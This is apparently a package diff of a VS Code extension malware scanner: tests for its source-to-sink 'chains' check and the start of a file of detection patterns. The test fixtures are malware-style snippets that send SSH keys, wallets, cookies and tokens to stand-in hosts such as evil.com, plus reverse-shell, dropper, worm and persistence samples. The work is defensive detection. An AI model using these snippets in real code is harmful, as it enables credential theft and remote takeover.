@trailofbits/vsix-audit 0.1.0

package/dist/scanner/checks/chains.test.js

@@ -0,0 +1,250 @@
+import { describe, expect, it } from "vitest";
+import { checkChains } from "./chains.js";
+function makeContents(files) {
+    const manifest = {
+        name: "test-extension",
+        publisher: "test",
+        version: "1.0.0",
+    };
+    const fileMap = new Map();
+    for (const [name, content] of Object.entries(files)) {
+        fileMap.set(name, Buffer.from(content));
+    }
+    return { manifest, files: fileMap, basePath: "/test" };
+}
+describe("checkChains", () => {
+    describe("DataFlow patterns (source → sink)", () => {
+        it("detects SSH key exfiltration", () => {
+            const code = `
+        const fs = require('fs');
+        const key = fs.readFileSync('.ssh/id_rsa');
+        axios.post('https://evil.com/steal', { data: key });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/evil.js": code }));
+            expect(findings.length).toBeGreaterThan(0);
+            const sshExfil = findings.find((f) => f.id === "FLOW_SSH_KEY_EXFIL");
+            expect(sshExfil).toBeDefined();
+            expect(sshExfil?.severity).toBe("critical");
+            expect(sshExfil?.category).toBe("dataflow");
+        });
+        it("detects wallet exfiltration", () => {
+            const code = `
+        const wallet = await fs.readFile('.ethereum/keystore/account');
+        await fetch('https://evil.com/api', { method: 'POST', body: wallet });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/steal.js": code }));
+            const walletExfil = findings.find((f) => f.id === "FLOW_WALLET_EXFIL");
+            expect(walletExfil).toBeDefined();
+            expect(walletExfil?.severity).toBe("critical");
+        });
+        it("detects credential file exfiltration", () => {
+            const code = `
+        const envData = fs.readFileSync('.env.production');
+        request.post('https://collector.io/data', { body: envData });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/leak.js": code }));
+            const credExfil = findings.find((f) => f.id === "FLOW_CRED_EXFIL");
+            expect(credExfil).toBeDefined();
+        });
+        it("detects browser data theft", () => {
+            const code = `
+        const cookies = fs.readFileSync('Google/Chrome/Cookies');
+        got.post('https://stealer.net', { json: cookies });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/browser.js": code }));
+            const browserExfil = findings.find((f) => f.id === "FLOW_BROWSER_EXFIL");
+            expect(browserExfil).toBeDefined();
+        });
+        it("detects Discord webhook exfiltration", () => {
+            const code = `
+        const sshKey = fs.readFileSync('.ssh/id_ed25519');
+        fetch('https://discord.com/api/webhooks/123/abc', { method: 'POST', body: sshKey });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/discord.js": code }));
+            const discordExfil = findings.find((f) => f.id === "FLOW_SSH_DISCORD");
+            expect(discordExfil).toBeDefined();
+        });
+        it("detects API token theft", () => {
+            const code = `
+        const token = process.env.GITHUB_TOKEN;
+        axios.post('https://collector.io/tokens', { token });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/tokens.js": code }));
+            const tokenExfil = findings.find((f) => f.id === "FLOW_TOKEN_EXFIL");
+            expect(tokenExfil).toBeDefined();
+        });
+        it("does not trigger when source and sink are too far apart", () => {
+            const code = `
+        const key = fs.readFileSync('.ssh/id_rsa');
+        ${"// padding\n".repeat(200)}
+        axios.post('https://example.com', { data: key });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/far.js": code }));
+            const sshExfil = findings.find((f) => f.id === "FLOW_SSH_KEY_EXFIL");
+            expect(sshExfil).toBeUndefined();
+        });
+    });
+    describe("Behavioral patterns (N-stage chains)", () => {
+        it("detects credential exfiltration chain", () => {
+            const code = `
+        const data = fs.readFileSync('/home/user/.env');
+        const encoded = Buffer.from(data).toString('base64');
+        await fetch('https://evil.com', { method: 'POST', body: encoded });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/chain.js": code }));
+            const credExfil = findings.find((f) => f.id === "BEHAVIOR_CREDENTIAL_EXFIL");
+            expect(credExfil).toBeDefined();
+            expect(credExfil?.severity).toBe("critical");
+            expect(credExfil?.category).toBe("behavioral");
+            expect(credExfil?.metadata?.stagesMatched).toBe(3);
+        });
+        it("detects reverse shell pattern", () => {
+            const code = `
+        const socket = net.connect(4444, 'attacker.com');
+        const shell = child_process.spawn('/bin/sh');
+        socket.pipe(shell.stdin);
+      `;
+            const findings = checkChains(makeContents({ "extension/src/shell.js": code }));
+            const reverseShell = findings.find((f) => f.id === "BEHAVIOR_REVERSE_SHELL");
+            expect(reverseShell).toBeDefined();
+            expect(reverseShell?.severity).toBe("critical");
+        });
+        it("detects dropper pattern", () => {
+            const code = `
+        const payload = await fetch('https://evil.com/malware.bin');
+        fs.writeFileSync('/tmp/.hidden', await payload.buffer());
+        child_process.exec('/tmp/.hidden');
+      `;
+            const findings = checkChains(makeContents({ "extension/src/dropper.js": code }));
+            const dropper = findings.find((f) => f.id === "BEHAVIOR_DROPPER");
+            expect(dropper).toBeDefined();
+            expect(dropper?.severity).toBe("critical");
+        });
+        it("detects supply chain attack pattern", () => {
+            const code = `
+        const home = os.homedir();
+        const result = execSync('whoami && uname -a');
+        await fetch('https://c2.evil.com/collect', { method: 'POST', body: result });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/supply.js": code }));
+            const supplyChain = findings.find((f) => f.id === "BEHAVIOR_SUPPLY_CHAIN_ATTACK");
+            expect(supplyChain).toBeDefined();
+            expect(supplyChain?.severity).toBe("high");
+        });
+        it("detects self-propagation (worm) pattern", () => {
+            const code = `
+        const token = fs.readFileSync('.npmrc');
+        const npmToken = process.env.NPM_TOKEN;
+        execSync('npm publish --access public');
+      `;
+            const findings = checkChains(makeContents({ "extension/src/worm.js": code }));
+            const propagation = findings.find((f) => f.id === "BEHAVIOR_SELF_PROPAGATION");
+            expect(propagation).toBeDefined();
+            expect(propagation?.severity).toBe("critical");
+        });
+        it("detects persistence mechanism", () => {
+            const code = `
+        const bashrc = path.join(os.homedir(), '.bashrc');
+        fs.appendFile(bashrc, '\\nexport PATH=$PATH:/tmp/.malware');
+      `;
+            const findings = checkChains(makeContents({ "extension/src/persist.js": code }));
+            const persistence = findings.find((f) => f.id === "BEHAVIOR_PERSISTENCE");
+            expect(persistence).toBeDefined();
+        });
+        it("does not trigger supply chain when stages are too sparse", () => {
+            // maxSpan is 1000 for supply chain, and requires all 3 stages
+            const code = `
+        const home = os.homedir();
+        ${"// lots of padding\n".repeat(100)}
+        execSync('build command');
+        ${"// more padding\n".repeat(100)}
+        fetch('https://telemetry.com');
+      `;
+            const findings = checkChains(makeContents({ "extension/src/sparse.js": code }));
+            const supplyChain = findings.find((f) => f.id === "BEHAVIOR_SUPPLY_CHAIN_ATTACK");
+            expect(supplyChain).toBeUndefined();
+        });
+    });
+    describe("Finding metadata", () => {
+        it("includes stage details in metadata", () => {
+            const code = `
+        const data = fs.readFileSync('/secrets');
+        const b64 = btoa(data);
+        axios.post('https://evil.com', b64);
+      `;
+            const findings = checkChains(makeContents({ "extension/src/meta.js": code }));
+            const finding = findings.find((f) => f.id === "BEHAVIOR_CREDENTIAL_EXFIL");
+            expect(finding).toBeDefined();
+            const metadata = finding?.metadata;
+            expect(metadata.stagesMatched).toBe(3);
+            expect(metadata.totalStages).toBe(3);
+            expect(metadata.stages).toHaveLength(3);
+            expect(metadata.stages[0]?.id).toBe("FILE_READ");
+            expect(metadata.stages[0]?.matched).toContain("readFileSync");
+        });
+        it("includes legitimate uses when specified", () => {
+            const code = `
+        const token = process.env.GITHUB_TOKEN;
+        axios.post('https://api.github.com', { headers: { auth: token } });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/auth.js": code }));
+            const finding = findings.find((f) => f.id === "FLOW_TOKEN_EXFIL");
+            expect(finding).toBeDefined();
+            const metadata = finding?.metadata;
+            expect(metadata.legitimateUses).toBeDefined();
+            expect(metadata.legitimateUses).toContain("Token validation services");
+        });
+        it("includes red flags when specified", () => {
+            const code = `
+        const key = fs.readFileSync('.ssh/id_rsa');
+        fetch('https://discord.com/api/webhooks/123/abc', { method: 'POST', body: key });
+      `;
+            const findings = checkChains(makeContents({ "extension/src/flags.js": code }));
+            const finding = findings.find((f) => f.id === "FLOW_SSH_KEY_EXFIL");
+            expect(finding).toBeDefined();
+            const metadata = finding?.metadata;
+            expect(metadata.redFlags).toBeDefined();
+            expect(metadata.redFlags).toContain("Reads .ssh directory");
+        });
+    });
+    describe("Edge cases", () => {
+        it("ignores non-scannable files", () => {
+            const findings = checkChains(makeContents({
+                "extension/assets/image.png": "fake png data with .ssh/id_rsa and axios.post",
+                "extension/data.json": '{"ssh": ".ssh/id_rsa", "send": "axios.post"}',
+            }));
+            expect(findings).toHaveLength(0);
+        });
+        it("deduplicates findings per file", () => {
+            const code = `
+        const key1 = fs.readFileSync('.ssh/id_rsa');
+        const key2 = fs.readFileSync('.ssh/id_ed25519');
+        axios.post('https://evil1.com', key1);
+        axios.post('https://evil2.com', key2);
+      `;
+            const findings = checkChains(makeContents({ "extension/src/multi.js": code }));
+            const sshFindings = findings.filter((f) => f.id === "FLOW_SSH_KEY_EXFIL");
+            expect(sshFindings).toHaveLength(1);
+        });
+        it("reports separate findings for different files", () => {
+            const code = `
+        const key = fs.readFileSync('.ssh/id_rsa');
+        axios.post('https://evil.com', key);
+      `;
+            const findings = checkChains(makeContents({
+                "extension/src/file1.js": code,
+                "extension/src/file2.js": code,
+            }));
+            const sshFindings = findings.filter((f) => f.id === "FLOW_SSH_KEY_EXFIL");
+            expect(sshFindings).toHaveLength(2);
+        });
+        it("handles empty files gracefully", () => {
+            const findings = checkChains(makeContents({
+                "extension/src/empty.js": "",
+                "extension/src/whitespace.js": "   \n\n   ",
+            }));
+            expect(findings).toHaveLength(0);
+        });
+    });
+});
+//# sourceMappingURL=chains.test.js.map

package/dist/scanner/checks/chains.test.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"chains.test.js","sourceRoot":"","sources":["../../../src/scanner/checks/chains.test.ts"],"names":[],"mappings":"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"}

package/dist/scanner/checks/dataflow.d.ts

@@ -0,0 +1,3 @@
+import type { Finding, VsixContents } from "../types.js";
+export declare function checkDataFlow(contents: VsixContents): Finding[];
+//# sourceMappingURL=dataflow.d.ts.map

package/dist/scanner/checks/dataflow.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"dataflow.d.ts","sourceRoot":"","sources":["../../../src/scanner/checks/dataflow.ts"],"names":[],"mappings":"AACA,OAAO,KAAK,EAAE,OAAO,EAAY,YAAY,EAAE,MAAM,aAAa,CAAC;AA4RnE,wBAAgB,aAAa,CAAC,QAAQ,EAAE,YAAY,GAAG,OAAO,EAAE,CA0F/D"}

package/dist/scanner/checks/dataflow.js

@@ -0,0 +1,316 @@
+import { isScannable, SCANNABLE_EXTENSIONS_PATTERN } from "../constants.js";
+import { findLineNumberByIndex } from "../utils.js";
+// Sources: Where sensitive data originates
+const SOURCES = [
+    {
+        id: "SSH_KEYS",
+        name: "SSH private keys",
+        description: "SSH private key files",
+        patterns: [
+            /\.ssh\/id_(?:rsa|ed25519|ecdsa|dsa)/gi,
+            /\.ssh\/config/gi,
+            /BEGIN\s+(?:RSA\s+)?PRIVATE\s+KEY/gi,
+            /BEGIN\s+OPENSSH\s+PRIVATE\s+KEY/gi,
+        ],
+        apis: [
+            /(?:fs|promises?)\.readFile(?:Sync)?\s*\([^)]*\.ssh/gi,
+            /readFile(?:Sync)?\s*\([^)]*id_(?:rsa|ed25519)/gi,
+        ],
+    },
+    {
+        id: "CRYPTO_WALLETS",
+        name: "Cryptocurrency wallets",
+        description: "Wallet files and seed phrases",
+        patterns: [
+            /\.ethereum/gi,
+            /\.bitcoin/gi,
+            /wallet\.dat/gi,
+            /keystore\/[a-z0-9-]+/gi,
+            /solana\/id\.json/gi,
+            /Exodus/gi,
+            /MetaMask/gi,
+            /phantom/gi,
+        ],
+        apis: [
+            /readFile(?:Sync)?\s*\([^)]*(?:wallet|ethereum|bitcoin|keystore)/gi,
+            /readFile(?:Sync)?\s*\([^)]*\.solana/gi,
+        ],
+    },
+    {
